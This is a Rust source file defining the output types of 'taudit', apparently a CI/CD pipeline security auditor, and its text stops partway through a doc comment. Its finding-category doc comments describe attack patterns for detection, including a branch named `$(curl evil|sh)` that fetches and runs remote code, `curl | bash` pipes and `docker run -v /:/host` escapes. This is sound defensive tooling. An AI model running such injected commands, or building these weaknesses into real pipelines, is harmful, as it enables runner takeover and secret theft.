taudit_api/
lib.rs

//! # taudit-api — stable wire types for JSON / SARIF / CloudEvents
//!
//! This crate owns every Rust type that appears in taudit's emitted
//! output (JSON `taudit-report.schema.json`, JSON `authority-graph.v1.json`,
//! SARIF `result.message.text` and `result.ruleId`, CloudEvents
//! `tauditruleid` / `tauditfindingfingerprint` extension attributes).
//!
//! ## Stability promise (0.x)
//!
//! While at `0.x`:
//! - Additive changes (new variants, new fields) MAY ship in any minor
//!   bump. Consumers should pin a minor (`taudit-api = "0.1"`) and
//!   review on each upgrade.
//! - Breaking changes (renamed fields, removed variants, changed serde
//!   representations) trigger a `0.{N+1}` minor bump and a CHANGELOG
//!   migration note.
//!
//! At `1.0`, the promise tightens: only `2.0` permits breaking changes; all
//! `1.x` minor bumps are additive.
//!
//! ## Use in downstream tooling
//!
//! Downstream consumers (tsign, axiom, custom SIEM integrations,
//! Backstage plugins) should depend on `taudit-api` directly rather than
//! `taudit-core`. `taudit-core` is workspace-internal and may break
//! between minors; `taudit-api` is the public contract.
//!
//! See ADR 0001 (graph as product) and ADR 0004 (prereleases publish to
//! crates.io).
30
31#![deny(missing_docs)]
32
33use serde::{Deserialize, Serialize, Serializer};
34use std::collections::{BTreeMap, HashMap};
35use std::path::PathBuf;
36
37// ── Severity ─────────────────────────────────────────────────────
38
39/// Severity of a finding. Ordered by `rank()` (Critical = most severe).
40#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
41#[serde(rename_all = "snake_case")]
42pub enum Severity {
43    /// Highest — exploitable now, full authority leak.
44    Critical,
45    /// Significant exposure that needs prompt action.
46    High,
47    /// Notable but bounded risk.
48    Medium,
49    /// Low priority / hygiene.
50    Low,
51    /// Informational — no direct exposure, surfaces context for triage.
52    Info,
53}
54
55impl Severity {
56    fn rank(self) -> u8 {
57        match self {
58            Severity::Critical => 0,
59            Severity::High => 1,
60            Severity::Medium => 2,
61            Severity::Low => 3,
62            Severity::Info => 4,
63        }
64    }
65}
66
67impl Ord for Severity {
68    fn cmp(&self, other: &Self) -> std::cmp::Ordering {
69        self.rank().cmp(&other.rank())
70    }
71}
72
73impl PartialOrd for Severity {
74    fn partial_cmp(&self, other: &Self) -> Option<std::cmp::Ordering> {
75        Some(self.cmp(other))
76    }
77}
78
79/// Move severity one rank toward `Info` (Critical -> High -> ... -> Info).
80/// `Info` stays `Info`. Used by both the suppression applicator and
81/// compensating-control detectors.
82///
83/// **API stability:** marked `#[doc(hidden)]` because this helper is a
84/// taudit-internal detail; downstream consumers should read `severity`
85/// directly from the JSON / SARIF / CloudEvents output.
86#[doc(hidden)]
87pub fn downgrade_severity(s: Severity) -> Severity {
88    match s {
89        Severity::Critical => Severity::High,
90        Severity::High => Severity::Medium,
91        Severity::Medium => Severity::Low,
92        Severity::Low => Severity::Info,
93        Severity::Info => Severity::Info,
94    }
95}
96
97// ── FindingCategory ──────────────────────────────────────────────
98
99/// MVP categories (1-5) are derivable from pipeline YAML alone.
100/// Stretch categories (6-9) need heuristics or metadata enrichment.
101#[allow(missing_docs)]
102#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
103#[serde(rename_all = "snake_case")]
104pub enum FindingCategory {
105    // MVP
106    AuthorityPropagation,
107    OverPrivilegedIdentity,
108    UnpinnedAction,
109    UntrustedWithAuthority,
110    ArtifactBoundaryCrossing,
111    // Stretch — implemented
112    FloatingImage,
113    LongLivedCredential,
114    /// Credential written to disk by a step (e.g. `persistCredentials: true` on a checkout).
115    /// Disk-persisted credentials are accessible to all subsequent steps and any process
116    /// with filesystem access, unlike runtime-only `HasAccessTo` authority.
117    PersistedCredential,
118    /// Dangerous trigger type (pull_request_target / pr) combined with secret/identity access.
119    TriggerContextMismatch,
120    /// Authority (secret/identity) flows into an opaque external workflow via DelegatesTo.
121    CrossWorkflowAuthorityChain,
122    /// Circular DelegatesTo chain — workflow calls itself transitively.
123    AuthorityCycle,
124    /// Privileged workflow (OIDC/broad identity) with no provenance attestation step.
125    UpliftWithoutAttestation,
126    /// Step writes to the environment gate ($GITHUB_ENV, pipeline variables) — authority can propagate.
127    SelfMutatingPipeline,
128    /// PR-triggered pipeline checks out the repository — attacker-controlled fork code lands on the runner.
129    CheckoutSelfPrExposure,
130    /// ADO variable group consumed by a PR-triggered job, crossing trust boundary.
131    VariableGroupInPrJob,
132    /// Self-hosted agent pool used in a PR-triggered job that also checks out the repository.
133    SelfHostedPoolPrHijack,
134    /// ADO self-hosted pool without workspace isolation (`clean: true`/`all`).
135    /// Shared self-hosted agents retain their workspace across pipeline runs.
136    /// Without `workspace: { clean: all }`, a PR build can deposit malicious
137    /// files that persist for the next (possibly privileged) pipeline run,
138    /// enabling workspace poisoning attacks.
139    SharedSelfHostedPoolNoIsolation,
140    /// Broad-scope ADO service connection reachable from a PR-triggered job without OIDC.
141    ServiceConnectionScopeMismatch,
142    /// ADO `resources.repositories[]` entry referenced by an `extends:`,
143    /// `template: x@alias`, or `checkout: alias` consumer resolves with no
144    /// `ref:` (default branch) or a mutable branch ref (`refs/heads/<name>`).
145    /// Whoever owns that branch can inject steps into the consuming pipeline.
146    TemplateExtendsUnpinnedBranch,
147    /// ADO `resources.repositories[]` entry pinned to a feature-class branch
148    /// (anything outside the `main` / `master` / `release/*` / `hotfix/*`
149    /// platform set). Feature branches typically have weaker push protection
150    /// than the trunk, so any developer with write access to that branch can
151    /// inject pipeline YAML that runs with the consumer's authority. Strictly
152    /// stronger signal than `template_extends_unpinned_branch` — co-fires.
153    TemplateRepoRefIsFeatureBranch,
154    /// Pipeline step uses an Azure VM remote-exec primitive (Set-AzVMExtension /
155    /// CustomScriptExtension, Invoke-AzVMRunCommand, az vm run-command, az vm extension set)
156    /// where the executed command line interpolates a pipeline secret or a SAS token —
157    /// pipeline-to-VM lateral movement primitive logged in plaintext to the VM and ARM.
158    VmRemoteExecViaPipelineSecret,
159    /// A SAS token freshly minted in-pipeline is interpolated into a CLI argument
160    /// (commandToExecute / scriptArguments / --arguments / -ArgumentList) instead of
161    /// passed via env var or stdin — argv ends up in /proc/*/cmdline, ETW, ARM status.
162    ShortLivedSasInCommandLine,
163    /// Pipeline secret value assigned to a shell variable inside an inline
164    /// script (`export VAR=$(SECRET)`, `$X = "$(SECRET)"`). Once the value
165    /// transits a shell variable, ADO's `$(SECRET)` log mask no longer
166    /// applies — transcripts (`Start-Transcript`, `bash -x`, terraform debug
167    /// logs) print the cleartext.
168    SecretToInlineScriptEnvExport,
169    /// Pipeline secret value written to a file under the agent workspace
170    /// (`$(System.DefaultWorkingDirectory)`, `$(Build.SourcesDirectory)`,
171    /// or relative paths) without `secureFile` task or chmod 600. The file
172    /// persists in the agent workspace and is uploaded by
173    /// `PublishPipelineArtifact` and crawlable by later steps.
174    SecretMaterialisedToWorkspaceFile,
175    /// PowerShell pulls a Key Vault secret with `-AsPlainText` (or
176    /// `ConvertFrom-SecureString -AsPlainText`, or older
177    /// `.SecretValueText` syntax) into a non-`SecureString` variable. The
178    /// value never traverses the ADO variable-group boundary, so verbose
179    /// Az/PS logging and error stack traces print the credential.
180    ///
181    /// Rule id is `keyvault_secret_to_plaintext` (single token "keyvault")
182    /// rather than the snake_case derivation `key_vault_…` — matches the
183    /// docs filename and the convention used in the corpus evidence.
184    #[serde(rename = "keyvault_secret_to_plaintext")]
185    KeyVaultSecretToPlaintext,
186    /// `terraform apply -auto-approve` against a production-named service connection
187    /// without an environment approval gate.
188    TerraformAutoApproveInProd,
189    /// `AzureCLI@2` task with `addSpnToEnvironment: true` AND an inline script —
190    /// the script can launder federated SPN/OIDC tokens into pipeline variables.
191    AddSpnWithInlineScript,
192    /// A `type: string` pipeline parameter (no `values:` allowlist) is interpolated
193    /// via `${{ parameters.X }}` into an inline shell/PowerShell script body —
194    /// shell injection vector for anyone with "queue build".
195    ParameterInterpolationIntoShell,
196    /// A `run:` block fetches a remote script from a mutable URL (`refs/heads/`,
197    /// `/main/`, `/master/`) and pipes it directly to a shell interpreter
198    /// (`curl … | bash`, `wget … | sh`, `bash <(curl …)`, `deno run https://…`).
199    /// Whoever controls that URL's content controls execution on the runner.
200    RuntimeScriptFetchedFromFloatingUrl,
201    /// Workflow trigger combines high-authority PR events
202    /// (`pull_request_target`, `issue_comment`, or `workflow_run`) with a step
203    /// whose `uses:` ref is a mutable branch/tag (not a 40-char SHA). Compromise
204    /// of the action's default branch yields full repo write on the target repo.
205    PrTriggerWithFloatingActionRef,
206    /// A `workflow_run`-triggered workflow captures a value from an external
207    /// API response (`gh pr view`, `gh api`, `curl api.github.com`) and writes
208    /// it into `$GITHUB_ENV`/`$GITHUB_OUTPUT`/`$GITHUB_PATH` without sanitisation.
209    /// A poisoned API field (branch name, title) injects environment variables
210    /// into every subsequent step in the same job.
211    UntrustedApiResponseToEnvSink,
212    /// A `pull_request`-triggered workflow logs into a container registry via a
213    /// floating (non-SHA-pinned) login action. The compromised action receives
214    /// OIDC tokens or registry credentials, and the workflow then pushes a
215    /// PR-controlled image to a shared registry.
216    PrBuildPushesImageWithFloatingCredentials,
217    /// First-party step writes a Secret/Identity-derived value into the
218    /// `$GITHUB_ENV` gate (or pipeline-variable equivalent) and a *later*
219    /// step in the same job that runs in `Untrusted` or `ThirdParty` trust
220    /// zone reads from the runner-managed env (`${{ env.X }}`). The two
221    /// component rules — `self_mutating_pipeline` (writer) and
222    /// `untrusted_with_authority` (consumer) — each see only half the
223    /// chain and emit no finding for the laundered consumer; this rule
224    /// closes the composition gap that R2 attack #3 exploited.
225    SecretViaEnvGateToUntrustedConsumer,
226    /// Positive-invariant rule (GHA): the workflow declares neither a
227    /// top-level nor a per-job `permissions:` block, leaving GITHUB_TOKEN at
228    /// its broad platform default. Fires once per workflow file.
229    NoWorkflowLevelPermissionsBlock,
230    /// Positive-invariant rule (ADO): a job referencing a production-named
231    /// service connection has no `environment:` binding, so it bypasses the
232    /// only ADO-side approval gate regardless of whether `-auto-approve` is
233    /// present. Strictly broader than `terraform_auto_approve_in_prod`.
234    ProdDeployJobNoEnvironmentGate,
235    /// Positive-invariant rule (cross-platform): a long-lived static
236    /// credential is in scope but the workflow does not currently use any
237    /// OIDC identity even though the target cloud supports federation.
238    /// Advisory uplift on top of `long_lived_credential` that wires the
239    /// existing `Recommendation::FederateIdentity` variant.
240    LongLivedSecretWithoutOidcRecommendation,
241    /// Positive-invariant rule (GHA): a PR-triggered workflow has multiple
242    /// privileged jobs where SOME have the standard fork-check `if:` and
243    /// OTHERS do not. Detects an intra-file inconsistency in defensive
244    /// posture — the org has the right instinct but applied it unevenly.
245    PullRequestWorkflowInconsistentForkCheck,
246    /// Positive-invariant rule (GitLab): a job with a production-named
247    /// `environment:` binding has no `rules:` / `only:` clause restricting
248    /// it to protected branches. Deploy job runs (or attempts to run) on
249    /// every pipeline trigger.
250    GitlabDeployJobMissingProtectedBranchOnly,
251    /// Two-step ADO chain: an inline script captures a `terraform output`
252    /// value (literal `terraform output` CLI invocation or a `$env:TF_OUT_*` /
253    /// `$TF_OUT_*` env var sourced from a Terraform CLI task) AND emits a
254    /// `##vso[task.setvariable variable=X;...]` directive setting that
255    /// captured value into pipeline variable `X`. A subsequent step in the
256    /// same job then expands `$(X)` in shell-expansion position
257    /// (`bash -c "..."`, `eval`, command substitution `$(...)`, PowerShell
258    /// `-split` / `Invoke-Command` / `Invoke-Expression`/`iex`, or as an
259    /// unquoted command word). The `task.setvariable` hop launders
260    /// attacker-controlled Terraform state — sourced from a remote backend
261    /// (S3 bucket, Azure Storage) that often has weaker access controls than
262    /// the pipeline itself — through pipeline-variable space and into a
263    /// shell interpreter.
264    TerraformOutputViaSetvariableShellExpansion,
265    /// GHA workflow declares a high-blast-radius trigger (`issue_comment`,
266    /// `pull_request_review`, `pull_request_review_comment`, `workflow_run`)
267    /// alongside write permissions or non-`GITHUB_TOKEN` secrets. Closes the
268    /// gap left by `trigger_context_mismatch` only firing on
269    /// `pull_request_target` / ADO `pr`.
270    RiskyTriggerWithAuthority,
271    /// A `jobs.<id>.outputs.<name>` value is sourced from `secrets.*`, an
272    /// OIDC-bearing step output, or has a credential-shaped name. Job outputs
273    /// flow unmasked through `needs.<job>.outputs.*` and are written to the
274    /// run log — masking is heuristic, never authoritative.
275    SensitiveValueInJobOutput,
276    /// A `workflow_dispatch.inputs.*` value flows into `curl` / `wget` /
277    /// `gh api` / a `run:` URL / `actions/checkout` `ref:`. Anyone with
278    /// dispatch permission can pivot the run to attacker-controlled refs or
279    /// hosts.
280    ManualDispatchInputToUrlOrCommand,
281    /// A reusable workflow call uses `secrets: inherit` while the caller is
282    /// triggered by an attacker-influenced event (`pull_request`,
283    /// `pull_request_target`, `issue_comment`, `workflow_run`). The whole
284    /// caller secret bag forwards to the callee regardless of what the callee
285    /// actually consumes — every transitive `uses:` in the called workflow
286    /// inherits the same scope.
287    SecretsInheritOverscopedPassthrough,
288    /// A `workflow_run`- or `pull_request_target`-triggered consumer
289    /// downloads an artifact from the originating run AND interprets that
290    /// artifact's content into a privileged sink (post-to-comment, write to
291    /// `$GITHUB_ENV`, `eval`, …). The producer ran in PR context, so a
292    /// malicious PR can write arbitrary content into the artifact while the
293    /// consumer holds upstream-repo authority.
294    UnsafePrArtifactInWorkflowRunConsumer,
295    /// A GitHub Actions `run:` block (or `actions/github-script` `script:` body)
296    /// interpolates an attacker-controllable expression — `${{ github.event.* }}`,
297    /// `${{ github.head_ref }}`, or `${{ inputs.* }}` from a privileged trigger
298    /// (`workflow_dispatch` / `workflow_run` / `issue_comment`) — directly into
299    /// the script text without first binding through an `env:` indirection.
300    /// Classic GitHub Actions remote-code-execution pattern.
301    ScriptInjectionViaUntrustedContext,
302    /// A workflow that holds non-`GITHUB_TOKEN` secrets or non-default
303    /// write permissions includes a step that uses an interactive debug action
304    /// (mxschmitt/action-tmate, lhotari/action-upterm, actions/tmate, …).
305    /// A maintainer flipping `debug_enabled=true` publishes the runner's full
306    /// environment over an external SSH endpoint.
307    InteractiveDebugActionInAuthorityWorkflow,
308    /// An `actions/cache` step keys the cache on a PR-derived expression
309    /// (`github.head_ref`, `github.event.pull_request.head.ref`, `github.actor`)
310    /// in a workflow that ALSO runs on `push: branches: [main]` — a PR can
311    /// poison the cache that the default-branch build later restores.
312    PrSpecificCacheKeyInDefaultBranchConsumer,
313    /// A `run:` step uses `gh ` / `gh api` with the default `GITHUB_TOKEN` to
314    /// perform a write-class action (`pr merge`, `release create/upload`,
315    /// `api -X POST/PATCH/PUT/DELETE` to `/repos/.../{contents,releases,actions/secrets,environments}`)
316    /// inside a workflow triggered by `pull_request`, `issue_comment`, or
317    /// `workflow_run` — runtime privilege escalation that static permission
318    /// checks miss.
319    GhCliWithDefaultTokenEscalating,
320    /// GitLab CI `$CI_JOB_TOKEN` (or `gitlab-ci-token:$CI_JOB_TOKEN`) used as a
321    /// bearer credential against an external HTTP API or fed to `docker login`
322    /// for `registry.gitlab.com`. CI_JOB_TOKEN's default scope (registry write,
323    /// package upload, project read) means a poisoned MR job that emits the
324    /// token to a webhook can pivot to package/registry pushes elsewhere.
325    CiJobTokenToExternalApi,
326    /// GitLab CI `id_tokens:` declares an `aud:` audience that is reused across
327    /// MR-context and protected-context jobs (no audience separation), or is a
328    /// wildcard / multi-cloud broker URL. The audience is what trades for
329    /// downstream cloud creds — a single shared `aud` means any job that
330    /// compromises the token assumes the most-privileged role any other job
331    /// uses.
332    IdTokenAudienceOverscoped,
333    /// Direct shell interpolation of attacker-controlled GitLab predefined
334    /// vars (`$CI_COMMIT_BRANCH`, `$CI_COMMIT_REF_NAME`, `$CI_COMMIT_TAG`,
335    /// `$CI_COMMIT_MESSAGE`, `$CI_COMMIT_TITLE`, `$CI_MERGE_REQUEST_TITLE`,
336    /// `$CI_MERGE_REQUEST_DESCRIPTION`,
337    /// `$CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`, `$CI_COMMIT_AUTHOR`) into
338    /// `script:` / `before_script:` / `after_script:` / `environment:url:`
339    /// without single-quote isolation. A branch named `` $(curl evil|sh) ``
340    /// executes inside the runner. GitLab generalisation of the GHA
341    /// `script_injection_via_untrusted_context` class.
342    UntrustedCiVarInShellInterpolation,
343    /// A GitLab `include:` references (a) a `remote:` URL pointing at a
344    /// branch (`/-/raw/<branch>/...`), (b) a `project:` with `ref:` resolving
345    /// to a mutable branch name (main/master/develop), or (c) an include with
346    /// no `ref:` at all (defaults to HEAD). Whoever owns that branch can
347    /// backdoor every consumer's pipeline silently — included YAML executes
348    /// with the consumer's secrets and CI_JOB_TOKEN.
349    UnpinnedIncludeRemoteOrBranchRef,
350    /// A GitLab job declares a `services: [docker:*-dind]` sidecar AND holds
351    /// at least one non-CI_JOB_TOKEN secret (registry creds, deploy keys,
352    /// signing keys, vault id_tokens). docker-in-docker exposes the full
353    /// Docker socket inside the job container — a malicious build step can
354    /// `docker run -v /:/host` from inside dind and read the runner host
355    /// filesystem (other jobs' artifacts, cached creds).
356    DindServiceGrantsHostAuthority,
357    /// A GitLab job whose name or `extends:` matches scanner patterns
358    /// (`sast`, `dast`, `secret_detection`, `dependency_scanning`,
359    /// `container_scanning`, `gitleaks`, `trivy`, `grype`, `semgrep`, etc.)
360    /// runs with `allow_failure: true` AND has no `rules:` clause that
361    /// surfaces the failure. The pipeline goes green even when the scan
362    /// errors out — silent-pass is worse than no scan because reviewers trust
363    /// the badge.
364    SecurityJobSilentlySkipped,
365    /// A GitLab `trigger:` job (downstream / child pipeline) runs in
366    /// `merge_request_event` context OR uses `include: artifact:` from a
367    /// previous job (dynamic child pipeline). Dynamic child pipelines are a
368    /// code-injection sink — anything the build step writes to the artifact
369    /// runs as a real pipeline with the parent project's secrets.
370    ChildPipelineTriggerInheritsAuthority,
371    /// A GitLab `cache:` declaration whose `key:` is hardcoded, `$CI_JOB_NAME`
372    /// only, or `$CI_COMMIT_REF_SLUG` without a `policy: pull` restriction.
373    /// Caches are stored per-runner keyed by `key:`; a poisoned MR can push a
374    /// malicious `node_modules/` cache that the next default-branch job
375    /// downloads and executes during `npm install`.
376    CacheKeyCrossesTrustBoundary,
377    /// A CI script constructs an HTTPS git URL with embedded credentials
378    /// (`https://user:$TOKEN@host/...`) before invoking `git clone`,
379    /// `git push`, or `git remote set-url`. The credential is exposed
380    /// in the process argv (visible to `ps`, `/proc/*/cmdline`), persists
381    /// in `.git/config` for the rest of the job, and may be uploaded as
382    /// part of any artifact that bundles the workspace.
383    PatEmbeddedInGitRemoteUrl,
384    /// A CI job triggers a different project's pipeline via the GitLab
385    /// REST API using `CI_JOB_TOKEN` and forwards user-influenced variables
386    /// through the `variables[KEY]=value` query/form parameter. The
387    /// downstream project's security depends on the trust contract between
388    /// the two projects — variable values flowing across that boundary
389    /// constitute a cross-project authority bridge.
390    CiTokenTriggersDownstreamWithVariablePassthrough,
391    /// A GitLab job emits an `artifacts.reports.dotenv: <file>` artifact
392    /// whose contents become pipeline variables for any consumer linked
393    /// via `needs:` or `dependencies:`. A consumer in a later stage that
394    /// targets a production-named environment inherits those variables
395    /// transparently — no explicit download is visible at the job level.
396    /// When the producer reads attacker-influenced inputs (branch names,
397    /// commit messages), the dotenv flow is a covert privilege escalation
398    /// channel into the deployment job.
399    DotenvArtifactFlowsToPrivilegedDeployment,
400    /// ADO inline script sets a sensitive-named pipeline variable via
401    /// `##vso[task.setvariable variable=<NAME>]` with `issecret=false` or
402    /// without the `issecret` flag at all. Without `issecret=true` the
403    /// variable value is printed in plaintext to the pipeline log and is
404    /// not masked in downstream step output.
405    SetvariableIssecretFalse,
406    /// A GHA `uses:` action reference contains a non-ASCII character —
407    /// possible Unicode confusable / homoglyph impersonating a trusted
408    /// action (e.g. Cyrillic `a` instead of Latin `a`, or U+2215
409    /// DIVISION SLASH instead of U+002F SOLIDUS).
410    HomoglyphInActionRef,
411    /// A GitHub Actions step mutates `GITHUB_PATH` before a later known
412    /// helper-delegating action passes sensitive material to a bare helper via
413    /// command-line arguments. The prior step can select the helper that
414    /// receives later action-only authority.
415    GhaHelperPathSensitiveArgv,
416    /// A GitHub Actions step mutates `GITHUB_PATH` before a later known
417    /// helper-delegating action passes sensitive material to a bare helper over
418    /// stdin, such as Docker login passwords or Wrangler secret payloads.
419    GhaHelperPathSensitiveStdin,
420    /// A GitHub Actions step mutates `GITHUB_PATH` before a later known
421    /// helper-delegating action runs a bare helper with sensitive environment
422    /// values in scope.
423    GhaHelperPathSensitiveEnv,
424    /// A GitHub Actions post action recomputes cleanup targets from ambient
425    /// environment rather than an action-owned state channel, allowing later
426    /// `GITHUB_ENV` writes to retarget cleanup.
427    GhaPostAmbientEnvCleanupPath,
428    /// A GitHub Actions action mints or exchanges later credentials and then
429    /// delegates them to a PATH-resolved helper.
430    GhaActionMintedSecretToHelper,
431    /// A GitHub Actions action invokes a security-sensitive helper by bare
432    /// name after an earlier same-job `GITHUB_PATH` mutation.
433    GhaHelperUntrustedPathResolution,
434    /// A GitHub Actions login action exposes credential material as step
435    /// outputs after helper login, making cross-job propagation easy to miss.
436    GhaSecretOutputAfterHelperLogin,
437    /// Umbrella GHA authority-confusion classifier: an earlier same-job
438    /// `GITHUB_PATH` mutation precedes a later helper action that receives or
439    /// mints sensitive authority.
440    LaterSecretMaterializedAfterPathMutation,
441    /// `actions/setup-node` cache mode resolves npm/pnpm/yarn helpers after an
442    /// earlier same-job `GITHUB_PATH` mutation.
443    GhaSetupNodeCacheHelperPathHandoff,
444    /// `actions/setup-python` cache mode resolves pip/pipenv/poetry helpers
445    /// after an earlier same-job `GITHUB_PATH` mutation.
446    GhaSetupPythonCacheHelperPathHandoff,
447    /// `actions/setup-python` pip-install mode runs pip while inheriting
448    /// ambient credentials or cloud authority.
449    GhaSetupPythonPipInstallAuthorityEnv,
450    /// `actions/setup-go` cache mode resolves Go helpers after an earlier
451    /// same-job `GITHUB_PATH` mutation.
452    GhaSetupGoCacheHelperPathHandoff,
453    /// `docker/setup-qemu-action` invokes Docker/QEMU helper flow in a job that
454    /// already has registry authority or private-image context.
455    GhaDockerSetupQemuPrivilegedDockerHelper,
456    /// Tool-installer action is followed by shell use of the installed helper
457    /// while deploy/signing authority is in scope.
458    GhaToolInstallerThenShellHelperAuthority,
459    /// Shell command sequence concentrates publish, deploy, signing, registry,
460    /// or release authority in a workflow step.
461    GhaWorkflowShellAuthorityConcentration,
462    /// `peter-evans/create-pull-request` receives PR token authority after an
463    /// earlier same-job `GITHUB_PATH` mutation and delegates to `git`.
464    GhaCreatePrGitTokenPathHandoff,
465    /// `crazy-max/ghaction-import-gpg` receives GPG private key/passphrase
466    /// material after an earlier same-job `GITHUB_PATH` mutation.
467    GhaImportGpgPrivateKeyHelperPath,
468    /// `webfactory/ssh-agent` receives SSH private key material after an
469    /// earlier same-job `GITHUB_PATH` mutation.
470    GhaSshAgentPrivateKeyToPathHelper,
471    /// `apple-actions/import-codesign-certs` receives macOS P12/keychain
472    /// material after an earlier same-job `GITHUB_PATH` mutation.
473    GhaMacosCodesignCertSecurityPath,
474    /// Pages deploy actions compose token/deploy-key Git authority after an
475    /// earlier same-job `GITHUB_PATH` mutation.
476    GhaPagesDeployTokenUrlToGitHelper,
477    /// Precision guard for actions that install a helper into the toolcache
478    /// and invoke that absolute path instead of resolving a bare helper from
479    /// runner `PATH`.
480    GhaToolcacheAbsolutePathDowngrade,
481    // Reserved — requires ADO/GH API enrichment beyond pipeline YAML.
482    // Sealed against deserialisation: a custom-rule YAML using these
483    // categories errors out with `unknown variant` at load time, because
484    // they cannot be detected from pipeline YAML alone. They still
485    // serialise normally so future runtime-enrichment paths inside the
486    // taudit binary can emit them, and the output schemas advertise them.
487    /// Requires runtime network telemetry or policy enrichment — not detectable from YAML alone.
488    #[serde(skip_deserializing)]
489    #[doc(hidden)]
490    EgressBlindspot,
491    /// Requires external audit-sink configuration data — not detectable from YAML alone.
492    #[serde(skip_deserializing)]
493    #[doc(hidden)]
494    MissingAuditTrail,
495}
496
497// ── Recommendation ───────────────────────────────────────────────
498
499/// Routing: scope findings -> TsafeRemediation; isolation findings -> CellosRemediation.
500#[allow(missing_docs)]
501#[derive(Debug, Clone, Serialize, Deserialize)]
502#[serde(tag = "type", rename_all = "snake_case")]
503pub enum Recommendation {
504    /// Remediate via `tsafe` — narrow / rotate / revoke a credential or scope.
505    TsafeRemediation {
506        command: String,
507        explanation: String,
508    },
509    /// Remediate via CellOS isolation primitives.
510    CellosRemediation { reason: String, spec_hint: String },
511    /// Pin a floating action reference to an immutable SHA.
512    PinAction { current: String, pinned: String },
513    /// Reduce the permissions block on the scope-bearing step.
514    ReducePermissions { current: String, minimum: String },
515    /// Replace a long-lived static credential with a federated OIDC identity.
516    FederateIdentity {
517        static_secret: String,
518        oidc_provider: String,
519    },
520    /// Free-form manual remediation — used when no canned action applies.
521    Manual { action: String },
522}
523
524// ── FindingSource ────────────────────────────────────────────────
525
/// Provenance of a finding — distinguishes findings emitted by built-in
/// taudit rules from findings emitted by user-loaded custom invariant YAML
/// (`--invariants-dir`). Custom rules can emit arbitrarily-worded findings
/// at any severity, so an operator piping output into a JIRA workflow or
/// SARIF upload needs a non-spoofable signal of which file the rule came
/// from.
///
/// # Wire format
///
/// The enum uses serde's default externally-tagged representation:
/// - [`FindingSource::BuiltIn`] serializes as the bare string `"built-in"`.
/// - [`FindingSource::Custom`] is a struct variant, so it serializes as
///   `{"custom": {"source_file": "<path>"}}`.
///
/// NOTE(review): confirm the nested custom shape against
/// `docs/finding-fingerprint.md` — a flat `{"custom": "<path>"}` form would
/// require a newtype variant rather than the struct variant declared here.
#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum FindingSource {
    /// Emitted by a built-in rule defined in `taudit-core::rules`. The
    /// authoritative trust anchor — the binary's release commit defines the
    /// rule logic. Serialises as the kebab-case string `"built-in"` to match
    /// `schemas/finding.v1.json`. The explicit `rename` is needed because the
    /// enum-level `snake_case` rule would otherwise produce `"built_in"`.
    /// This is also the `Default` variant.
    #[default]
    #[serde(rename = "built-in")]
    BuiltIn,
    /// Emitted by a custom invariant rule loaded from the given YAML file.
    /// The path is the file the rule was loaded from, retained so operators
    /// can audit which file produced any given finding.
    Custom {
        /// On-disk path of the custom-rule YAML file that produced this finding.
        source_file: PathBuf,
    },
}
552
553impl FindingSource {
554    /// True for findings emitted by built-in rules.
555    pub fn is_built_in(&self) -> bool {
556        matches!(self, FindingSource::BuiltIn)
557    }
558}
559
560// ── FixEffort ────────────────────────────────────────────────────
561
/// Coarse-grained remediation effort. Surfaces in JSON `time_to_fix` and SARIF
/// `properties.timeToFix` so triage dashboards can sort by `severity * effort`.
///
/// The four buckets are deliberately wide. Precise time estimates would invite
/// argument; the buckets exist to separate "flip a flag" from "rewrite a job"
/// from "renegotiate ops policy".
///
/// Variants serialize under their `snake_case` names: `trivial`, `small`,
/// `medium`, `large`.
///
/// Per `MEMORY/.../blueteam-corpus-defense.md` Section 3 / Enhancement E-3.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum FixEffort {
    /// ~5 minutes. Mechanical change to a single file (flip a flag, pin a SHA,
    /// add a `permissions: {}` block). No structural risk.
    Trivial,
    /// ~1 hour. Refactor a step or job: split a script, add a fork-check,
    /// move a secret to an environment binding.
    Small,
    /// ~1 day. Restructure a job or pipeline: introduce an environment gate,
    /// move from inline scripts to a sandboxed action, add an OIDC role.
    Medium,
    /// ~1 week or more. Operational policy change: migrate from PATs to OIDC
    /// across an org, change branch protection model, retire a service principal.
    Large,
}
586
587// ── FindingExtras + Finding ──────────────────────────────────────
588
/// Optional finding metadata. Lives on every `Finding` via
/// `#[serde(flatten)]` so consumers see the fields at the top of the
/// finding object — same place they'd appear if declared inline on
/// `Finding`. Default-constructed extras serialize to nothing (every
/// `Option::None`, empty `Vec`, and `false` flag is skipped on
/// serialization), so existing snapshots remain byte-stable until a rule
/// populates a field. Every field also carries `#[serde(default)]`, so
/// input that omits a field deserializes it to that field's default.
///
/// **Why a wrapper struct?** The 30+ rule call sites use struct
/// literal syntax. Adding fields directly to `Finding` would force
/// every site to edit. With `extras: FindingExtras::default()`, new
/// extras can be added in a single place.
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
pub struct FindingExtras {
    /// Stable UUID v5 over `(NAMESPACE, fingerprint)` — collapses
    /// per-hop findings against the same authority root into one group
    /// for SIEM display. See `compute_finding_group_id`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub finding_group_id: Option<String>,

    /// Coarse remediation effort. See [`FixEffort`].
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub time_to_fix: Option<FixEffort>,

    /// Human-readable list of controls that already neutralise (or partially
    /// neutralise) this finding — populated when a compensating-control
    /// detector downgrades severity. Empty when no downgrade applied.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub compensating_controls: Vec<String>,

    /// Set to `true` by the suppression applicator when a matching
    /// `.taudit-suppressions.yml` entry exists AND the configured mode
    /// is `Suppress`. The finding still appears in output (audit trail
    /// preserved) but consumers can filter on this field. Omitted from
    /// serialized output while `false`.
    #[serde(default, skip_serializing_if = "is_false")]
    pub suppressed: bool,

    /// Original pre-downgrade severity. Populated by the suppression
    /// applicator OR a compensating-control detector when `severity`
    /// is mutated. `None` means the current severity is the rule-emitted
    /// value.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub original_severity: Option<Severity>,

    /// Operator-supplied justification from the matching suppression
    /// entry. `None` when no suppression applies.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub suppression_reason: Option<String>,

    /// Per-finding stable anchor mixed into the fingerprint canonical
    /// string. Populated by rules that have no natural graph node to
